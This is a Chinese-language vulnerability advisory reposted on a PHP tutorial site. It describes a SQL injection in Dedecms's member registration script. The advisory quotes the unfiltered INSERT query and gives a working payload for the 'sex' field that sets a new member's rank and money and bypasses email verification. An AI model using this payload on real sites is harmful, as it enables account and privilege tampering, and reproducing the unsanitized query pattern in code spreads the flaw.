来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] Dedecms 存在SQL注射漏洞,在magic_quotes_gpc=off时,攻击者可以将恶意SQL语句带入SQL执行,导致dedecms的审核机制被绕过.需要magic_quotes_gpc=off,同样没有什么大危害的漏洞.漏洞代码如下:我们看membe...
Dedecms 存在SQL注射漏洞,在magic_quotes_gpc=off时,攻击者可以将恶意SQL语句带入SQL执行,导致dedecms的审核机制被绕过.
需要magic_quotes_gpc=off,同样没有什么大危害的漏洞. 漏洞代码如下: 我们看member/reg_new.php的代码$sex变量在表单是单选,程序员没做任何过滤 191 $inQuery = "INSERT INTO `detest_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` , 192 `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` ) 193 VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores', 194 '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; 195 www.2cto.com if($dsql->ExecuteNoneQuery($inQuery)) 我们提交$sex=boy',100,100,'sss@xx.xx',1000,0,0,'face',0,'',1316751900,'',1316751900,'');%00 直接把rank 跟money都设置为100了等,绕过邮件审核。 作者 c4rp3nt3r |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com